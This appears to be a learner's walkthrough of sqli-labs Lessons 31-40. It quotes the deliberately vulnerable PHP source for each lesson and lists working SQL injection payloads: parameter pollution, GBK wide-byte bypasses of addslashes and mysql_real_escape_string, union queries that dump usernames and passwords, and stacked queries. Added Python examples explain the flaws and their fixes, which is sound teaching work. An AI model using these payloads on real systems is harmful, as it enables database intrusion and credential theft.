SQLI-LAB Practice Notes (Less 31 - Less 40)

The following is just a record I wrote while working through the sqli-lab exercises, for reference only. Since I have already studied some SQL injection, most of the content comes without explanation; if anything is unclear, please look it up with a search engine and you should find what you need.

Less - 31 Protection with WAF

(Lesson 31: protection with a WAF)

Test:

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=3

Note: the row for id 3 is displayed

Source Code:

$qs = $_SERVER['QUERY_STRING'];
$hint=$qs;
$id1=java_implimentation($qs);
$id=$_GET['id'];
whitelist($id1);
$id = '"' .$id. '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row) {  
      echo 'Your Login name:'. $row['username'];
      echo 'Your Password:' .$row['password'];
} else{
    print_r(mysql_error());
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input) {
    $match = preg_match("/^\d+$/", $input);
    if($match) {
    } else {   
        header('Location: hacked.php');
    }
}
// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string) {
    $q_s = $query_string;
    $qs_array= explode("&",$q_s);
     foreach($qs_array as $key => $value) {
        $val=substr($value,0,2);
        if($val=="id") {
            $id_value=substr($value,3,30);
            return $id_value;
            break;
        }
    }
}

Solution:

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,2,3 --+

    Others:

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

    http://localhost/sqli-lab/Less-31/login.php?id=1&id=") union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
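An added example (not the lab's code) of the parameter-parsing mismatch that the Less-31 source relies on: java_implimentation() validates the first id= in the query string, while PHP's $_GET['id'] returns the last one, so the whitelisted value is never the value that reaches the query. The Python below models both parsers and a hardened check that validates exactly the value it will use; the sample query strings are constructed.

```python
import re
from urllib.parse import parse_qsl

def first_id(query_string):
    """Model of the page's java_implimentation(): the FIRST id= wins."""
    for part in query_string.split("&"):
        if part[:2] == "id":
            return part[3:33]                 # substr($value, 3, 30)
    return None

def last_id(query_string):
    """Model of PHP's $_GET['id']: the LAST occurrence of a repeated key wins."""
    value = None
    for key, val in parse_qsl(query_string, keep_blank_values=True):
        if key == "id":
            value = val
    return value

def whitelist(value):
    """The page's numeric whitelist (PHP regex ^\\d+$)."""
    return value is not None and re.fullmatch(r"\d+", value) is not None

def vulnerable_check(query_string):
    """Lab logic: whitelist first_id(), but build the query from last_id().
    Returns (passed_whitelist, value_used_in_query)."""
    return whitelist(first_id(query_string)), last_id(query_string)

def hardened_check(query_string):
    """Fix: parse once, reject repeated id= keys, and validate the very
    value that will be used. Returns (accepted, value_or_None)."""
    values = [v for k, v in parse_qsl(query_string, keep_blank_values=True)
              if k == "id"]
    if len(values) != 1 or not whitelist(values[0]):
        return False, None
    return True, values[0]

if __name__ == "__main__":
    # Constructed sample query strings; the first is the page's own test request.
    for qs in ("id=1&id=3", "id=1&id=x", "id=7"):
        print(qs, "vulnerable:", vulnerable_check(qs), "hardened:", hardened_check(qs))
```

With "id=1&id=3" the vulnerable path passes the whitelist on "1" but queries with "3"; the hardened path refuses any request carrying more than one id=.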

Less - 32 Bypass addslashes()

(Lesson 32: bypassing addslashes())

Test:

    http://localhost/sqli-lab/Less-32/index.php?id='"\\--+

Note: the single quote, double quote and backslash all get a backslash added

    http://localhost/sqli-lab/Less-32/index.php?id=�'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1 Note: id is wrapped in single quotes

    http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+

Note: convert the UTF-8 single quote to UTF-16; this can be done with Decoder - Encoder: UTF8, UTF16, ... (access requires a VPN/proxy)

Source Code:

function check_addslashes($string){
     $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
     $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
     $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
     return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-32/index.php?id=�' or 1=1 --+

    Others:

    http://localhost/sqli-lab/Less-32/index.php?id=�' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

    http://localhost/sqli-lab/Less-32/index.php?id=%af%27 union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 33 Bypass addslashes()

(Lesson 33: bypassing addslashes())

Test:

    http://localhost/sqli-lab/Less-33/index.php?id=�'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''�\'' LIMIT 0,1' at line 1 Note: id is wrapped in single quotes

Source Code:

function check_addslashes($string){
     $string= addslashes($string);   
     return $string;
}
$id=check_addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-33/index.php?id=�' or 1=1 --+

    Others:

    http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,database(),version() --+

    http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

    http://localhost/sqli-lab/Less-33/index.php?id=�' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+

Less - 34 Bypass Add SLASHES

(Lesson 34: bypassing addslashes)

Test:

    http://localhost/sqli-lab/Less-34/index.php

Note: a GBK-encoded database combined with addslashes() has an encoding vulnerability; after the backslash is added, the byte sequences become %BF%5C%27 and %FE%5C%27

Source Code:

$uname = addslashes($uname1);
$passwd= addslashes($passwd1);
mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
     echo '<img src="../images/flag.jpg"  />';   
}else{
     print_r(mysql_error());
     echo '<img src="../images/slap.jpg" />';   
}

Solution:

    uname=1%BF' or 1=1 #&passwd=1%BF' or 1=1 #&submit=Submit

    uname=1%FE' or 1=1 #&passwd=1%FE' or 1=1 #&submit=Submit

    Others:

    uname=1%Bf' union select version(),database() #&passwd=1%BF' or 1=1 #&submit=Submit

    uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit

    uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit

Note: if this method keeps producing encoding errors, check the character set of the database and of the tables in it
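An added example (not the lab's code) of the wide-byte mechanism behind Lessons 32 through 37: addslashes() inserts the 0x5C byte of %BF%5C%27 at the byte level, but once the connection charset is gbk (SET NAMES gbk) the server reads 0xBF 0x5C as one two-byte character, and the quote that follows is left unescaped. The Python below models that order of operations next to the charset-aware order (decode first, then escape); the sample input is constructed. The real fix remains parameterized queries.

```python
def addslashes(data: bytes) -> bytes:
    """Byte-level model of PHP addslashes(): a 0x5C backslash is inserted
    before ' " \\ and NUL. That 0x5C is the one in the page's %BF%5C%27."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def escape_text(text: str) -> str:
    """Same escaping, but applied to decoded characters instead of raw bytes."""
    return "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)

def quote_is_escaped(fragment: str) -> bool:
    """True if every single quote in the decoded text still has its backslash."""
    return all(i > 0 and fragment[i - 1] == "\\"
               for i, ch in enumerate(fragment) if ch == "'")

def escape_then_decode(raw: bytes, charset: str) -> str:
    """Lab order: escape the bytes, then the server decodes them under the
    connection charset. Under gbk, 0xBF 0x5C forms a single character and the
    backslash disappears into it, leaving the quote bare."""
    return addslashes(raw).decode(charset, errors="replace")

def decode_then_escape(raw: bytes, charset: str) -> str:
    """Charset-aware order: decode with the real connection charset first, then
    escape characters, so the backslash can never be swallowed by a lead byte."""
    return escape_text(raw.decode(charset, errors="replace"))

if __name__ == "__main__":
    sample = b"\xbf'"   # constructed input: lead byte 0xBF followed by a quote
    for charset in ("gbk", "utf-8"):
        seen = escape_then_decode(sample, charset)
        print(charset, repr(seen), "quote escaped:", quote_is_escaped(seen))
    fixed = decode_then_escape(sample, "gbk")
    print("decode first:", repr(fixed), "quote escaped:", quote_is_escaped(fixed))
```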

Less - 35 why care for addslashes()

(Lesson 35: why care about addslashes())

Test:

    http://localhost/sqli-lab/Less-35/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 0,1' at line 1 Note: there are no single or double quotes around id

Source Code:

function check_addslashes($string){
    $string = addslashes($string);
    return $string;
}
$id=check_addslashes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,2,3 #

    Others:

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,version(),database() #

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #

    http://localhost/sqli-lab/Less-35/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 #

Less - 36 Bypass MySQL Real Escape String

(Lesson 36: bypassing MySQL_real_escape_string)

Test:

    http://localhost/sqli-lab/Less-36/index.php?id=%BF' or 1=1 #

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 Note: id is wrapped in single quotes

Source Code:

function check_quotes($string){
    $string= mysql_real_escape_string($string);   
    return $string;
}
$id=check_quotes($_GET['id']);
mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

Solution:

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' or 1=1%23

    Others:

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,version(),database()%23

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

    http://localhost/sqli-lab/Less-36/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1%23

Less - 37 MySQL_real_escape_string

(Lesson 37: MySQL_real_escape_string)

Test:

    http://localhost/sqli-lab/Less-37/index.php
        uname=2'&passwd=1'&submit=Submit

Note: fails, no SQL query error is reported

Source Code:

mysql_query("SET NAMES gbk");
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
    echo '<img src="../images/flag.jpg"  />';   
}else{
    print_r(mysql_error());
    echo '<img src="../images/slap.jpg" />';   
}

Solution:

    uname=2%FE' or 1=1  #&passwd=1%FE' or 1=1 #&submit=Submit

    Others:

    uname=1%FE' union select version(),database() #&passwd=1%FE' or 1=1 #&submit=Submit

    uname=1%FE' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&passwd=1%FE' or 1=1 #&submit=Submit

    uname=1%FE' union select group_concat(username),group_concat(password) from security.users where 1 #&passwd=1%FE' or 1=1 #&submit=Submit

Less - 38 stacked Query

(Lesson 38: stacked queries)

Test:

    http://localhost/sqli-lab/Less-38/index.php?id=1%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 Note: id is wrapped in single quotes

Source Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){  
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)){
    }
}else{
     print_r(mysqli_error($con1));
}

Note: mysqli_more_results() checks whether a multi-statement query has more result sets

Solution:

    http://localhost/sqli-lab/Less-38/index.php?id=2%FE' or 1=1 %23

    Others:

    http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,version(),database() %23

    http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    http://localhost/sqli-lab/Less-38/index.php?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
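An added example, not the lab's code, illustrating the point behind Lessons 38 to 40: mysqli_multi_query() runs every statement in the string it receives, so a ';' inside user input starts a second statement, whereas a single-statement API with a bound parameter treats the whole input as data. Python's sqlite3 stands in for MySQL here (executescript() for the multi-statement API, execute() for the single-statement one); the table contents and the probe input are constructed, and the probe's second statement only creates an empty marker table.

```python
import sqlite3

PROBE = "1'; CREATE TABLE marker(x); --"   # constructed stacked input, benign side effect

def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the lab's users table (not the lab's data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    con.commit()
    return con

def table_exists(con: sqlite3.Connection, name: str) -> bool:
    row = con.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                      (name,)).fetchone()
    return row is not None

def lookup_multi(con: sqlite3.Connection, user_id: str) -> None:
    """Stand-in for mysqli_multi_query(): string-built SQL handed to an API that
    runs every statement it finds. executescript() discards SELECT rows; the
    point is that whatever follows the ';' is executed as well."""
    con.executescript(f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1")

def single_statement_rejects(con: sqlite3.Connection, user_id: str) -> bool:
    """Same string-built SQL on a one-statement API (mysqli_query-style):
    sqlite3 refuses to run a string holding more than one statement."""
    try:
        con.execute(f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1").fetchone()
        return False
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True

def lookup_safe(con: sqlite3.Connection, user_id: str):
    """The real fix: one statement, user_id bound as a parameter, never as SQL."""
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchone()

if __name__ == "__main__":
    con = make_db()
    print("safe lookup of probe:", lookup_safe(con, PROBE))
    print("single-statement API rejects probe:", single_statement_rejects(con, PROBE))
    print("marker table before multi-statement call:", table_exists(con, "marker"))
    lookup_multi(con, PROBE)
    print("marker table after multi-statement call:", table_exists(con, "marker"))
```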

Less - 39 stacked Query Integer type

(Lesson 39: stacked queries, integer type)

Test:

    http://localhost/sqli-lab/Less-39/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1 Note: numeric type

Source Code:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)){
    }
}else{
    print_r(mysqli_error($con1));
}

Solution:

    http://localhost/sqli-lab/Less-39/index.php?id=0 or 1=1 %23

    Others:

    http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,version(),database() %23

    http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    http://localhost/sqli-lab/Less-39/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

Less - 40 stacked Query String type Blind

(Lesson 40: stacked queries, string type, blind)

Test:

    http://localhost/sqli-lab/Less-40/index.php?id=1

Note: the row for id 1 is displayed normally

    http://localhost/sqli-lab/Less-40/index.php?id=1'

Note: no error is displayed

    http://localhost/sqli-lab/Less-40/index.php?id=0' or 1=1 %23
    http://localhost/sqli-lab/Less-40/index.php?id=0') or 1=1 %23

Note: the row for id 1 is displayed normally

Source Code:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
if (mysqli_multi_query($con1, $sql)) {
    if ($result = mysqli_store_result($con1)) {
        if($row = mysqli_fetch_row($result)) {  
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)) {
    }
}

Solution:

    http://localhost/sqli-lab/Less-40/index.php?id=0%FE') or 1=1 %23

    Others:

    http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,version(),database() %23

    http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    http://localhost/sqli-lab/Less-40/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
